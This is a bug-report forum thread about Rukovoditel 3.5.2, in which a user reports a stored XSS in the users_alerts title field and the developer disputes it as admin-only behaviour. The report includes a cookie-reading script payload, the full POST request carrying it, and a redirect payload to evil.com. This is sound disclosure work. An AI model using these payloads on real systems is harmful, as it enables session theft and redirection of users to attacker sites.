Stored Cross-Site Scripting (XSS) in users_alerts

Any critical bugs will be fixed within 24-48 hours.
Post Reply
Toxi4
Posts: 6
Joined: 08 Apr 2024, 14:31
Name: Anton Kartunov
Location: Russia

Stored Cross-Site Scripting (XSS) in users_alerts

Post by Toxi4 »

Hey!

I found an xss vulnerability in the users_alerts module.
In the title parameter when creating an alert for all users, you can insert a payload.

Payload: "/><script>alert(document.cookie)</script>.

Request:

Code: Select all

POST /index.php?module=users_alerts/users_alerts&action=save&id=1&token=QRVySyiI7t HTTP/1.1
Host: 192.168.0.15
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Content-Type: application/x-www-form-urlencoded
Cookie: [cookie]
Upgrade-Insecure-Requests: 1

form_session_token=QRVySyiI7t&is_active=1&type=warning&title=qwerty%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Eqwerty&description=qwerty&location=all&start_date=2024-04-08&end_date=2024-04-10&users_groups%5B%5D=0&users_groups%5B%5D=6&assigned_to%5B%5D=1&assigned_to%5B%5D=2
The script can run on all pages of all users
XSS3.png
Through this vulnerability, attacker can steal the sessions of all users of the system or redirect them to the attacker’s website.But to exploit this vulnerability attacker needs admin's access
I have used Rukovoditel 3.5.2
Top
User avatar
support
Site Admin
Posts: 6215
Joined: 19 Oct 2014, 18:22
Name: Sergey Kharchishin
Location: Russia, Evpatoriya

Re: Stored Cross-Site Scripting (XSS) in users_alerts

Post by support »

Anton, this is not vulnerability. As administrator you can add own php/js/html code for app. This is not bug or vulnerability.
Top
Toxi4
Posts: 6
Joined: 08 Apr 2024, 14:31
Name: Anton Kartunov
Location: Russia

Re: Stored Cross-Site Scripting (XSS) in users_alerts

Post by Toxi4 »

I’ll answer here the same way as in the other post. viewtopic.php?p=20132

I can't agree with you. Even if the application has functionality for adding HTML/PHP/JS code, it is still necessary to filter out potentially dangerous functions.

I don’t think that your users will be happy if they are redirected to a malicious site after logging in.

Code: Select all

"/><script>location.replace("https://evil.com")</script>
Or if an unscrupulous administrator decides to steal the cookies of all users and enter to their personal accounts.

I also want to add that it seems to me that there is no point in adding HTML/PHP/JS code to alerts function for users :)
Top
User avatar
support
Site Admin
Posts: 6215
Joined: 19 Oct 2014, 18:22
Name: Sergey Kharchishin
Location: Russia, Evpatoriya

Re: Stored Cross-Site Scripting (XSS) in users_alerts

Post by support »

As I said before vulnerability - if not admin user can add something like this. There is PHP code and JS code field type and ADMIN user can add any code there too. And this is not vulnerability too, because this is how app works. Admin can add own custom code for app.

So to find any XSS, please login as not admin user.
Top
Post Reply

Return to “Bug Report version 3.5.3”